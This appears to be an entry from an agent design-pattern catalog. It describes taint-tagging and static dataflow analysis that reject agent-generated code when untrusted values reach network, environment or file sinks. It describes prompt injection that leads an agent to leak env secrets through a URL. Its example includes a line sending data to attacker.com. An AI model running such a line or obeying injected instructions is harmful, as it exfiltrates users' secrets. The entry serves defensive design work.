Code-Then-Execute with Dataflow Analysis

also known as Tainted-Value Code Execution, Sandbox-DSL with Provenance

Have the agent emit code in a sandbox DSL whose values are statically tagged trusted/tainted via dataflow analysis before execution, enabling per-value policy enforcement.

Context

An agent solves complex tasks by generating code that the runtime executes — data extraction, multi-step computations, tool chains. Some inputs to the code come from untrusted sources (user input, fetched content, tool outputs from third-party APIs).

Problem

Without provenance tracking, the executor cannot distinguish trusted values (the agent's plan, user goal) from tainted values (fetched content that could be attacker-controlled). The same `exec(code)` runs both. A prompt injection in fetched content can produce code that, e.g., reads secrets from env and embeds them in an outbound URL — and the sandbox cannot reject it because it cannot tell the URL is tainted.

Forces

Free-form code generation is the agent's primary capability.
Static dataflow analysis on generated code constrains expressivity.
Tagging every value as trusted/tainted requires the DSL to track provenance.

Example

A research agent generates code: `summary = summarize(fetch('https://...'))`. The fetched content is TAINTED. The agent then writes `requests.get(f'https://attacker.com?d={summary}')`. Dataflow analysis sees TAINTED → network egress → rejects program before execution. Without the analysis the sandbox would have allowed the egress because outbound HTTPS is permitted.

Diagram

flowchart TD Agent[Agent emits DSL program] --> Tag[Values tagged TRUSTED/TAINTED] Tag --> DFA[Static dataflow analysis] DFA -->|tainted reaches sink| Reject[Reject before execution] DFA -->|safe| Sandbox[Execute in sandbox]

Solution

Therefore:

Define a sandbox DSL (subset of Python/TS or a custom Pyret-style language) where every value carries a provenance tag (TRUSTED, TAINTED, MIXED). The runtime performs static dataflow analysis on each agent-generated program before execution: if a TAINTED value reaches a sink declared sensitive (network egress, env reads, file writes outside scratch dir), reject the program. Pair with sandbox-isolation, action-selector-pattern.

What this pattern forbids. The runtime may not execute agent-generated code without first running dataflow analysis; programs whose taint reaches a sensitive sink are rejected, not sanitized.

And the patterns that stand alongside it, or against it —

complementsSandbox Isolation★★— Run agent-emitted code or actions in a contained environment with restricted filesystem, network, and process privileges.
complementsCode-as-Action Agent★— Have the agent emit a code snippet as its action each step, executed in a constrained interpreter, instead of emitting JSON tool calls; tool composition becomes function nesting and control flow inside the snippet.
complementsCode Execution★★— Let the model emit code, run it in a sandbox, and treat the run as the answer instead of trusting the model to compute in its head.
complementsAction Selector Pattern★— Eliminate the feedback channel from tool outputs back into the agent's reasoning step by having the agent select actions from a fixed catalog rather than free-form generation over tool output.
complementsTool Output Poisoning Defense★— Treat tool output as untrusted content and apply instruction-stripping plus per-tool trust labels.

Neighbourhood

Click any neighbour to follow the language. Scroll to zoom, drag to pan.

References

Provenance

Source: patterns/code-then-execute-with-dataflow.md on GitHub · commit 0f962e5 · view history
Added to catalog: 2026-05-23
Last updated: 2026-05-23
Contribute: open an issue or PR at github.com/agentpatternscatalog/patterns.